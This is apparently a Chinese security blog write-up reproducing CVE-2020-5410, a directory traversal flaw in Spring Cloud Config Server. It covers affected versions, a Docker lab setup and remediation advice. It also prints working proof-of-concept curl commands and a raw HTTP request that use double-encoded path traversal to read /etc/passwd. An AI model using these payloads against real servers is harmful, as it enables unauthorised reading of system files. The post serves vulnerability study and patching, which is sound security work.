SpringCloudConfig⽬录穿越漏洞(CVE-2020-5410)复现
Spring Cloud Config ⽬录穿越漏洞
(CVE-2020-5410)
⼀、漏洞简介
Spring Cloud Config,2.2.3之前的2.2.x版本,2.1.9之前的2.1.x版本以及较旧的不受⽀持的版本允许应⽤程序通过spring-cloud-config-server模块提供任意配置⽂件。恶意⽤户或攻击者可以使⽤特制URL发送请求,这可能导致⽬录遍历攻击。
⼆、影响版本
Spring Cloud Config: 2.2.0 to 2.2.2
Spring Cloud Config: 2.1.0 to 2.1.8
三、漏洞环境&漏洞复现
PoC:
curl
"vulnerablemachine:port/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development" curl "127.0.0.1:8888/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development" docker环境部署:
docker pull hyness/spring-cloud-config-server:2.1.6.RELEASE
docker run -it --name=spring-cloud-config-server \
-p 8888:8888 \
hyness/spring-cloud-config-server:2.1.6.RELEASE \
--fig.server.git.uri=github/spring-cloud-samples/config-repo
访问地址:192.168.0.110:8888/
执⾏POC:
curl
"192.168.0.110:8888/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development" Burp执⾏访问:
详细数据包:
GET /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development HTTP/1.1
Host: 192.168.0.110:8888
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
系统执⾏访问记录:
四、修复建议:
升级到 Spring Cloud Config ⾄2.2.3版本或2.1.9版本,并且将Spring-Cloud-Config-Server服务放置在内⽹中,同时使⽤Spring Security进⾏⾝份验证。最新版本下载地址为:github/spring-cloud/spring-cloud-config/releases
参考:
github/osamahamad/CVE-2020-5410-POC
xz.aliyun/t/7877
blog.csdn/wanzt123/article/details/106765503
免责声明:本站提供安全⼯具、程序(⽅法)可能带有攻击性,仅供安全研究与教学之⽤,风险⾃负!
转载声明:著作权归作者所有。商业转载请联系作者获得授权,⾮商业转载请注明出处。
订阅查看更多复现⽂章、学习笔记
thelostworld
安全路上,与你并肩前⾏
个⼈知乎:www.zhihu/people/fu-wei-43-69/columns
个⼈简书:www.jianshu/u/bf0e38a8d400
个⼈CSDN:blog.csdn/qq_37602797/category_10169006.html
个⼈博客园:wwwblogs/thelostworld/
FREEBUF主页:www.freebuf/author/thelostworld?type=article
雀语博客主页:www.yuque/thelostworld
欢迎添加本作者交流,添加时备注⼀下“”
cve漏洞库
2021近期往期内容:

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。